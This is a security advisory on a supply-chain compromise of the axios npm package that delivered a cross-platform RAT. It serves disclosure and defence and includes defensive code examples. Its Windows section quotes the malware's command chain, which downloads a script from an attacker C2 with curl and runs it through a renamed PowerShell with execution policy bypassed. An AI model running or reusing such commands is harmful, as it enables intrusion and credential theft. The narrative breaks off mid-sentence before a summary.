Supply Chain Compromise of axios npm Package

Last Updated: March 31, 2026

By: John Hammond

Note: This Rapid Response article has been written with AI assistance.

Acknowledgments: Special thanks to Jevon Ang, Michael Elford, Jordan Sexton, Armelle French, Stephanie Fairless, Juzzy Allen, Ryan Dowd, Chad Hudson, Lindon Wass, James Maclachlan, James Northey, Josh Kiriakoff, Jai Minton, and Max Rogers for their contributions to this investigation and response.

UPDATE @ 3/31 at 6:30pm ET

Since publishing our analysis last night, Huntress has continued to monitor the axios supply chain compromise. The Huntress SOC has seen further indicators on systems, including a system.bat script with a user-run key on a system called Microsoft Update, similar to the one seen in the axios compromise, which instead contacts calltan[.]com. This happens to pre-date the axios compromise, and the exact date of creation is unknown, but it shares a similar theme to another domain linked to this compromise, callnrwise[.]com. Notably, the calltan[.]com domain has been linked back to a binary recently used by DPRK actors by researchers at Volexity.

While the exact motivation behind the attack remains unclear, multiple lines of evidence now point to North Korean state-sponsored activity. Other researchers, including ones at Elastic, have noted that the macOS binary delivered by the plain-crypto-js post-install hook has overlaps with a backdoor attributed to a DPRK-linked threat cluster. Additionally, the internal project name macWebT links directly to BlueNoroff's documented webT module from RustBucket malware campaigns. Google Threat Intelligence Group has also attributed the attack to UNC1069, a suspected North Korean threat actor.
With the malicious packages now removed from the npm registry and the C2 infrastructure offline, we do not expect to see new initial exploitation or follow-on post-exploitation activity from the specific addresses identified in this campaign. However, any system that executed the malicious payload during the exposure window should still be treated as fully compromised. Organizations must continue to follow the remediation guidance outlined below, including rotating all credentials and rebuilding affected systems, as the RAT's capabilities for credential theft and data exfiltration mean the full scope of compromise may not be immediately apparent.

--------------------------

ORIGINAL POST

TL;DR: Huntress has observed active exploitation of a supply chain compromise targeting the axios npm package -- one of the most widely used JavaScript libraries, with over 100 million weekly downloads. The attack delivered a cross-platform Remote Access Trojan (RAT) to macOS, Windows, and Linux systems via a malicious dependency injected into backdoored axios releases. Organizations should immediately audit their dependencies for axios@1.14.1 or axios@0.30.4, treat any system that installed either version as compromised, and follow the remediation guidance below.

Background

On March 31, 2026, a coordinated supply chain attack was executed against the axios npm package. An attacker compromised the npm credentials of the lead maintainer account (jasonsaayman) and manually published two backdoored releases: axios@1.14.1 (tagged latest) and axios@0.30.4 (tagged legacy). These versions introduced a phantom dependency -- plain-crypto-js@4.2.1 -- a package that had not existed before that day and is never actually imported by axios code. Its sole purpose was to execute a postinstall script that drops and runs a cross-platform RAT targeting macOS, Windows, and Linux.

axios is a promise-based HTTP client used extensively across the JavaScript and Node.js ecosystem.
It is a transitive dependency for countless packages, CI/CD pipelines, developer workstations, and production applications worldwide. The scope of this compromise is significant: any environment that ran npm install and resolved to axios@1.14.1 or axios@0.30.4 during the approximately three-hour exposure window may have executed the malicious payload automatically with no user interaction required.

The malicious versions were published during overnight hours (just after midnight UTC, Sunday night into Monday morning), maximizing the time before maintainers and the npm security team could respond. The compromised packages were removed from npm approximately three hours later, but the damage was already done. Within our partner base, Huntress observed at least 135 endpoints across all operating systems contacting the attacker's command-and-control infrastructure during the exposure window.

What happened

Account compromise

An attacker gained access to the jasonsaayman npm account -- the primary maintainer of the open-source axios library. The maintainer email was changed from the legitimate address to ifstap@proton[.]me, and the attacker bypassed the normal GitHub Actions OIDC-based CI/CD publishing workflow by publishing directly via the npm CLI using a long-lived access token.

One critical detail: even on the v1.x branch where OIDC Trusted Publishing was configured, the publish workflow still passed NPM_TOKEN as an environment variable alongside OIDC credentials. When both are present, npm uses the token. This meant the long-lived token was effectively the authentication method for all publishes, regardless of OIDC configuration.

The real maintainer later stated in GitHub issue #10604: "im trying to get support to understand how this even happened. i have 2fa / mfa on practically everything." The exact method of token compromise remains undetermined.

Pre-staging

The attack was pre-staged approximately 18 hours before detonation.
A clean version of plain-crypto-js@4.2.0 was published by an attacker-created account (nrwise@proton[.]me) to establish a publishing history on npm. This reduced the likelihood that automated scanners would flag the subsequent malicious version purely on account novelty.

Detonation timeline

| Timestamp (UTC) | Event |
|---|---|
| 2026-03-30 23:59:12 | plain-crypto-js@4.2.1 published — malicious postinstall payload introduced |
| 2026-03-31 00:05:41 | Socket automated detection flags plain-crypto-js@4.2.1 as malware (~6 min after publish) |
| 2026-03-31 00:21:58 | axios@1.14.1 published and tagged latest — the attack goes live |
| 2026-03-31 00:23:27 | First Huntress-observed infection — macOS endpoint executes RAT, 89 seconds after publish |
| 2026-03-31 00:58:05 | First Huntress-observed Windows infection via wt.exe |
| 2026-03-31 01:00:57 | axios@0.30.4 published and tagged legacy — second branch targeted |
| ~2026-03-31 03:29 | plain-crypto-js removed from npm by npm security team |
| ~2026-03-31 03:30 | Compromised axios versions removed from npm |

The first infection on a Huntress-monitored endpoint landed 89 seconds after axios@1.14.1 was published. This is consistent with automated CI/CD pipelines and developer machines using caret ranges (^1.x) without locked dependencies — the malicious version resolved immediately on the next npm install.

Technical details

The dropper: setup.js

When plain-crypto-js@4.2.1 was installed as a dependency of the backdoored axios, its postinstall hook executed node setup.js. This 4,209-byte JavaScript file used a two-layer obfuscation scheme:

- Reversed Base64: Encoded strings were reversed, underscores replaced with = padding, then base64-decoded
- XOR cipher: Key "OrDeR_7077" — alphabetic characters produce NaN in Number(), becoming 0 in bitwise operations, yielding effective key digits [0,0,0,0,0,0,7,0,7,7]

All 18 obfuscated strings in the stq[] array hide module names (child_process, os, fs), the C2 URL, shell commands, and file paths.
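
As an added example (not code from the dropper or from Huntress), here is a Node.js sketch of how an analyst could undo the two layers described above. The key and the NaN-to-zero behaviour come from the text; the layer order, the `i % key.length` indexing and the sample strings are assumptions made for this example.

```javascript
// Added illustration of the two string-hiding layers described in the article.
// Assumptions, not stated on the page: the reversed-base64 layer is undone first,
// and character i is XORed with the key digit at position i % key.length.
const KEY = "OrDeR_7077"; // key string quoted in the article

// Number("O") is NaN and (NaN | 0) is 0, so letters and "_" contribute nothing.
function effectiveKey(key) {
  return key.split("").map(Number).map((n) => n | 0);
}

// Layer 1: reverse the string, restore "=" padding from "_", base64-decode.
function undoReversedBase64(encoded) {
  const b64 = encoded.split("").reverse().join("").replace(/_/g, "=");
  return Buffer.from(b64, "base64");
}

// Layer 2: XOR each byte with its key digit (indexing is the assumption above).
function decodeString(encoded, key = KEY) {
  const digits = effectiveKey(key);
  const bytes = undoReversedBase64(encoded);
  return Array.from(bytes, (b, i) => String.fromCharCode(b ^ digits[i % digits.length])).join("");
}

// How many bytes the XOR layer actually changes: a measure of how thin it is.
function bytesChangedByXor(encoded, key = KEY) {
  const digits = effectiveKey(key);
  return Array.from(undoReversedBase64(encoded))
    .filter((b, i) => (b ^ digits[i % digits.length]) !== b).length;
}

// Constructed samples (encoded for this demo, not taken from the dropper).
const SAMPLES = ["__wczVGZoJ3dfRGbph2Y", "_M3b", "_MnZ"];

for (const s of SAMPLES) {
  console.log(s, "->", decodeString(s), `(${bytesChangedByXor(s)} bytes changed by XOR)`);
}
```

Because seven of the ten key positions are zero, most bytes survive the XOR layer unchanged, so the base64 layer alone already exposes most of each string to a string-scanning tool.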
On execution, setup.js detects the operating system via os.platform() and launches a platform-specific payload:

- macOS (darwin): Writes an AppleScript to a temp file, which downloads the RAT binary via curl
- Windows (win32): Writes a VBScript that copies powershell.exe to %PROGRAMDATA%\wt.exe, then downloads and executes a PowerShell RAT
- Linux: Downloads a Python RAT script to /tmp/ld.py and executes it

After payload delivery, setup.js performs three anti-forensics operations:

1. Deletes itself (setup.js)
2. Deletes package.json (which contains the postinstall hook…the evidence)
3. Renames package.md to package.json — replacing the manifest with a clean v4.2.0 stub

Post-cleanup, the node_modules/plain-crypto-js/ directory appears to be a normal crypto library. The presence of this directory is itself evidence of compromise, even if the contents appear clean.

Windows tradecraft

The Windows infection chain proceeds through multiple stages designed to evade detection:

    node setup.js
    → Writes VBScript to %TEMP%\6202033.vbs (hidden window, style 0)
    → Copies powershell.exe to %PROGRAMDATA%\wt.exe
    → cmd.exe /c curl -s -X POST -d "packages.npm.org/product1" "http://sfrclak[.]com:8000/6202033" > %TEMP%\6202033.ps1
    → %PROGRAMDATA%\wt.exe -w hidden -ep bypass -file %TEMP%\6202033.ps1
    → Deletes 6202033.ps1
    → Deletes 6202033.vbs

Figure 1: The Huntress EDR detecting the execution of this attack chain

The renamed powershell.exe → wt.exe is a deliberate EDR evasion technique. wt.exe is the legitimate filename for Windows Terminal, so process-name based heuristics may not flag it. The VBScript and PowerShell stages both self-delete after execution.

Stage 2: PowerShell RAT

The second-stage payload is a full-featured PowerShell RAT that was captured by Huntress SOC analysts while the C2 was still serving payloads.
On first execution, it establishes persistence:

- Creates %PROGRAMDATA%\system.bat with a download cradle that re-fetches the RAT from C2 on every login
- Sets the system.bat file attribute to Hidden
- Adds a registry Run key at HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate pointing to the batch file

The RAT then performs initial reconnaissance, enumerating the user's Documents, Desktop, OneDrive, AppData\Roaming, and all filesystem drive roots. It
A supply chain compromise of the widely-used axios npm package delivered a cross-platform Remote Access Trojan (RAT) via malicious dependencies injected into backdoored releases. Affected versions are axios@1.14.1 and axios@0.30.4, which should be treated as compromised. While the malicious packages have been removed and C2 infrastructure is offline, any system that executed the payload must be considered fully compromised, requiring credential rotation and system rebuilding.
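
One way to run the dependency audit the TL;DR calls for, as an added example that is not Huntress tooling: a Node.js function that walks a parsed package-lock.json in either the flat `packages` layout or the older nested `dependencies` layout and reports the backdoored axios versions and any plain-crypto-js entry, including transitive ones. The package names and bad versions come from the article; the lockfile objects, `some-sdk`, `demo-app` and the clean version number are constructed for the demo.

```javascript
// Added example. Package names and bad versions are the ones named in the article;
// the lockfile objects at the bottom are constructed samples.
const BAD_AXIOS = new Set(["1.14.1", "0.30.4"]);
const PHANTOM = "plain-crypto-js";

function verdict(name, version) {
  if (name === "axios" && BAD_AXIOS.has(version)) return "backdoored axios release";
  // Any version counts: the dropper swaps in a clean-looking 4.2.0 manifest afterwards.
  if (name === PHANTOM) return "phantom dependency";
  return null;
}

function auditLockfile(lock) {
  const findings = [];
  const record = (name, version, where) => {
    const reason = verdict(name, version);
    if (reason) findings.push({ name, version, where, reason });
  };
  if (lock.packages) {
    // lockfileVersion 2 and 3: flat map keyed by install path ("" is the root project).
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path !== "") record(path.split("node_modules/").pop(), meta.version, path);
    }
  } else {
    // lockfileVersion 1: nested "dependencies" tree, so recurse for transitive hits.
    const walk = (deps, trail) => {
      for (const [name, meta] of Object.entries(deps || {})) {
        record(name, meta.version, `${trail}/${name}`);
        walk(meta.dependencies, `${trail}/${name}`);
      }
    };
    walk(lock.dependencies, "");
  }
  return findings;
}

// Constructed lockfiles: a v3 file with a transitive hit, a v1 file, and a clean one.
const V3_LOCK = { lockfileVersion: 3, packages: {
  "": { name: "demo-app", version: "1.0.0" },
  "node_modules/some-sdk": { version: "2.0.0" },
  "node_modules/some-sdk/node_modules/axios": { version: "1.14.1" },
  "node_modules/plain-crypto-js": { version: "4.2.1" } } };
const V1_LOCK = { lockfileVersion: 1, dependencies: {
  "some-sdk": { version: "2.0.0", dependencies: { axios: { version: "0.30.4" } } } } };
const CLEAN_LOCK = { lockfileVersion: 3, packages: {
  "": { name: "demo-app", version: "1.0.0" },
  "node_modules/axios": { version: "1.13.0" } } };

for (const lock of [V3_LOCK, V1_LOCK, CLEAN_LOCK]) console.log(auditLockfile(lock));
```

A clean lockfile today does not clear a host that installed during the exposure window, since the lockfile may have been regenerated since; a plain-crypto-js directory on disk or in build caches remains the stronger signal.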